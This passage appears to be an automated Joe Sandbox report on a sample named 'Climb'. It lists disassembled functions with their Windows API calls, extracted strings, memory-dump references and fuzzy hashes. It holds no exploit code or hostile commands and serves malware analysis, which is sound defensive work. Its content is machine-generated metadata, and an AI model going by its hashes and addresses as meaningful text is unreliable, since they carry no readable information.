                                                                                                                                                                      • Opcode Fuzzy Hash: 339ebbf8a92ac77c6207fdce41527c439539cedaaff0bd9ad112f135a86f151f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0EE06531240640AEDB216B74AC0DBE93F61BF21335F04921AFBB5680E0C7714644EB21
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0054EC36
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0054EC40
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0054EC60
                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 0054EC81
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                      • Opcode ID: 3dc995a863aa77df94dc066e2afa5ec5c8253fb270dd0a4b69690e7af1563261
                                                                                                                                                                      • Instruction ID: 278e66716214d6294b8ffb1e1ab4a1bb696130b34505f720b750c9068ad4de75
                                                                                                                                                                      • Opcode Fuzzy Hash: 3dc995a863aa77df94dc066e2afa5ec5c8253fb270dd0a4b69690e7af1563261
                                                                                                                                                                      • Instruction Fuzzy Hash: EBE0E574800208DFCB409FA19949A6DBBF1BB28311B108849E90AE3290D7395906AF20
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0054EC4A
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0054EC54
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0054EC60
                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 0054EC81
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                      • Opcode ID: 51f2f00a5e93798d5382ccae9335074a9b0503a4823f8de63e10e0e074212b2f
                                                                                                                                                                      • Instruction ID: 6d2b635f6074c9aafc6afdfd75c1a247e317acedc6712d8edacdd5df38e3f91d
                                                                                                                                                                      • Opcode Fuzzy Hash: 51f2f00a5e93798d5382ccae9335074a9b0503a4823f8de63e10e0e074212b2f
                                                                                                                                                                      • Instruction Fuzzy Hash: A0E01A74C00208DFCF409FA1D848A6DBBF1BF28311B108409E90AF3290D7395905AF20
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                      • String ID: @COM_EVENTOBJ$bnU
                                                                                                                                                                      • API String ID: 2948472770-878518255
                                                                                                                                                                      • Opcode ID: c7675579f18758b7d660c73f8d0734373d6bbb41de59c557247fb65d52af9feb
                                                                                                                                                                      • Instruction ID: 9d4f6684e500a3559b69bad3dcf0392b85f61cd0fa9e2dfc065d63485f8c41b9
                                                                                                                                                                      • Opcode Fuzzy Hash: c7675579f18758b7d660c73f8d0734373d6bbb41de59c557247fb65d52af9feb
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F19D70A082019FD714DF14C885BAEFBE1FF94708F54881DF58A9B2A1D775EA85CB82
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 005105B2: EnterCriticalSection.KERNEL32(005C170C,?,00000000,?,004FD22A,005C3570,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?), ref: 005105BD
                                                                                                                                                                        • Part of subcall function 005105B2: LeaveCriticalSection.KERNEL32(005C170C,?,004FD22A,005C3570,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?,00000001,005C2430), ref: 005105FA
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 00510413: __onexit.LIBCMT ref: 00510419
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00578658
                                                                                                                                                                        • Part of subcall function 00510568: EnterCriticalSection.KERNEL32(005C170C,00000000,?,004FD258,005C3570,005327C9,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?), ref: 00510572
                                                                                                                                                                        • Part of subcall function 00510568: LeaveCriticalSection.KERNEL32(005C170C,?,004FD258,005C3570,005327C9,00000001,00000000,?,?,0056F023,?,?,00000000,00000001,?,00000001), ref: 005105A5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                      • String ID: Variable must be of type 'Object'.$bnU
                                                                                                                                                                      • API String ID: 535116098-1714817190
                                                                                                                                                                      • Opcode ID: ca47ffe84346981c0c0e10052044b47799055bae47ef9064d9e314f5813ac892
                                                                                                                                                                      • Instruction ID: 7c03225c2b710268f3cac691b2d342d43537f881540a18853e1b36dd5b29e244
                                                                                                                                                                      • Opcode Fuzzy Hash: ca47ffe84346981c0c0e10052044b47799055bae47ef9064d9e314f5813ac892
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F919D74A40209AFCB04EF55E899DBD7FB1FF48304F108449F90AAB292DB71AE45EB51
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF
                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00565919
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Connection_wcslen
                                                                                                                                                                      • String ID: *$LPT
                                                                                                                                                                      • API String ID: 1725874428-3443410124
                                                                                                                                                                      • Opcode ID: ad4028653e8efe86add706ac21d12b291ed27723dd008f1718e3baa4e5cd556e
                                                                                                                                                                      • Instruction ID: aa3c991269f11451f687798c91776ba03e524ee1b7a9cfd4c1b524168a3e3889
                                                                                                                                                                      • Opcode Fuzzy Hash: ad4028653e8efe86add706ac21d12b291ed27723dd008f1718e3baa4e5cd556e
                                                                                                                                                                      • Instruction Fuzzy Hash: 14917C75A00604DFDB14DF94C894EAABBF1BF44318F188099E8499F362D775EE85CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 005558AF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContainedObject
                                                                                                                                                                      • String ID: 0$\$Container
                                                                                                                                                                      • API String ID: 3565006973-2222120309
                                                                                                                                                                      • Opcode ID: 93ce70416c8082f05a1704f72b95440417b180a24a4b23f1dd29a63086f13643
                                                                                                                                                                      • Instruction ID: db8ef7356954f93fc50c461c8d1b571615f4b2c714d09c9cace79e2bbfd78521
                                                                                                                                                                      • Opcode Fuzzy Hash: 93ce70416c8082f05a1704f72b95440417b180a24a4b23f1dd29a63086f13643
                                                                                                                                                                      • Instruction Fuzzy Hash: 50812970600601EFDB14DF54C8A4B6ABBF9FF48711F24856EF94A8B291EBB4E845CB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0051E67D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                      • String ID: pow
                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                      • Opcode ID: 2422f0235bf3764516b529cc1a8635271341bead62276deb0e5618b39f6f9d11
                                                                                                                                                                      • Instruction ID: d977450aa5a751e352abe1e2b21658366286f1630a9e06cbe4cc1c8ddf7d874b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2422f0235bf3764516b529cc1a8635271341bead62276deb0e5618b39f6f9d11
                                                                                                                                                                      • Instruction Fuzzy Hash: 21518961E0A202D6E7117754FD463BA2FA0FFA1700F704D59F891422E8DF398CE9EA46
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: #
                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                      • Opcode ID: 2c528475de98318dfe35c950f73a2d9c28d1afb19d26f417f98744474ba0a606
                                                                                                                                                                      • Instruction ID: abd7a556f5df67a267537a123882a82102fcc8a5e0c7bb397a7d6718c670954a
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c528475de98318dfe35c950f73a2d9c28d1afb19d26f417f98744474ba0a606
                                                                                                                                                                      • Instruction Fuzzy Hash: 0451FE31A0434A9BDF25DF68C441AFE7FA0FF16318F64445AE9919B2D0DB349D82CB61
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0050F6DB
                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0050F6F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                      • Opcode ID: 991d09fdeef8a1de1270e3decddb69dc19ad39f71b019c0ddae49ccb87ed17cd
                                                                                                                                                                      • Instruction ID: 7a29d10f0e375ae65777b25770830452d66a96424952c2805299fea311bc098a
                                                                                                                                                                      • Opcode Fuzzy Hash: 991d09fdeef8a1de1270e3decddb69dc19ad39f71b019c0ddae49ccb87ed17cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E5159718087489BD320AF15DC86BBFBBE8FB94304F81484EF2D9411A1DB348529CB2B
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 005840BD
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005840F8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                      • Opcode ID: 5634dae545c40495d96338cf393b6e41c38ed6e258d34a96b3665dc47ec9086f
                                                                                                                                                                      • Instruction ID: 7b69cf98dc5b5882a8e9513e8d777c5978b9ed86ebed5350b79f6c1562ba05bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 5634dae545c40495d96338cf393b6e41c38ed6e258d34a96b3665dc47ec9086f
                                                                                                                                                                      • Instruction Fuzzy Hash: D831AF71100605AADB10EF24CC84FBB7BA9FF98724F008619FEA5A7190DA34AC81DB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 005850BD
                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005850D2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID: '
                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                      • Opcode ID: edf6fb3b9a3c17dfc84c6ff52dbe11d05656d13f333c13a5178b1c60f3d5fcda
                                                                                                                                                                      • Instruction ID: 47885ddfe743d5aaa96e9948eb7ba9a97263f9cb2d26b1c8f4ca58a908fc3b4c
                                                                                                                                                                      • Opcode Fuzzy Hash: edf6fb3b9a3c17dfc84c6ff52dbe11d05656d13f333c13a5178b1c60f3d5fcda
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D314674A0160ADFDB14DFA9C884BEABBB5FF09300F10406AED04AB391E771A945DF90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                        • Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242
                                                                                                                                                                      • GetParent.USER32(?), ref: 00533440
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 005334CA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$ParentProc
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 2181805148-3685820393
                                                                                                                                                                      • Opcode ID: b48543599bbd73702a43f05ebcafd12b050839becbe800df7cd97465fdc08aee
                                                                                                                                                                      • Instruction ID: f9bb64f8bba252db364788b24cfd7688cf640537e5e776550ef7c6070288bdfa
                                                                                                                                                                      • Opcode Fuzzy Hash: b48543599bbd73702a43f05ebcafd12b050839becbe800df7cd97465fdc08aee
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218D30201148AFCF269F688A49DBA3F66EF06360F140255F7255B2E2C7B58E56E614
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004F78B1
                                                                                                                                                                        • Part of subcall function 004F7873: GetStockObject.GDI32(00000011), ref: 004F78C5
                                                                                                                                                                        • Part of subcall function 004F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004F78CF
                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00584216
                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00584230
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                      • String ID: static
                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                      • Opcode ID: 051e6562796fa36b7e4734505a72e8d36e52f3590873de9ef20563982716a2e3
                                                                                                                                                                      • Instruction ID: 7e3a7982063a51b580284972a7c5fd9baf63abf97fd66151b0911d3d10946bac
                                                                                                                                                                      • Opcode Fuzzy Hash: 051e6562796fa36b7e4734505a72e8d36e52f3590873de9ef20563982716a2e3
                                                                                                                                                                      • Instruction Fuzzy Hash: D811267661020AAFDB00EFA8CC45AFA7BF8FB08354F014919FD56E3250E634E851AB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0056D7C2
                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0056D7EB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                      • Opcode ID: 0f63cfd85e7e3505e929a8f74f388519a04fbe9128e6d857ada78439b2a0cba7
                                                                                                                                                                      • Instruction ID: 14622eb633e203053ee46c76a397c817a40f963844c9fdae685085374c46e127
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f63cfd85e7e3505e929a8f74f388519a04fbe9128e6d857ada78439b2a0cba7
                                                                                                                                                                      • Instruction Fuzzy Hash: C0110671B0123679D7344B628C85FE7BFBCFB127A4F004A26F50993180D2649844D2F1
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 0055761D
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00557629
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                      • String ID: STOP
                                                                                                                                                                      • API String ID: 1256254125-2411985666
